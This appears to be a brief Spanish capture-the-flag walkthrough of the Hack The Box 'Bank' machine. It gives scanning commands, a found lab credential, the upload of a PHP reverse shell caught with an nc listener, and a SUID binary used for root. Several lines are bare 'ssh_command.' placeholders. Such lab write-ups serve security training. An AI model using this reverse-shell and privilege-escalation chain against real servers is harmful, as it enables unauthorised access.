Bank

Mar 2, 2022
HTB Linux

nmap -A -p- -oA bank 10.129.121.9 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA bank 10.129.121.9

nmap -sU -O -p- -oA bank-udp 10.129.121.9

nikto -h 10.129.121.9:80

ssh_command.

ssh_command.

echo “10.129.121.9 bank.htb” | sudo tee -a /etc/hosts

ssh_command.

ffus -u “http://bank.htb/FUZZ” -w /usr/share/seclists/Discover/Web-Content/directory-list-2.3-medium.txt

ssh_command.

ssh_command.

Nos dirigimos a http://10.129.121.9 pero no tenemos credenciales

ssh_command.

Le hacemos un cat al archivo y vemos credenciales-> chris@bank.htb:!##HTBB4nkP4ssw0rd!##

ssh_command.

Nos logeamos

ssh_command.

cp /usr/share/webshells/php/php-reverse-shell.php shell.htb

Modificamos el archivo con la ip de la maquina kali y el puerto 443

nc -lvnp 443

Subimos el archivo shell.htb

Le damos click a Click Here en attachments

ssh_command.

cd /tmp

find / -perm -u=s 2>/dev/null

file /var/htb/bin/emergency

ls -al /var/htb/bin/emergency

/var/htb/bin/emergency

ssh_command.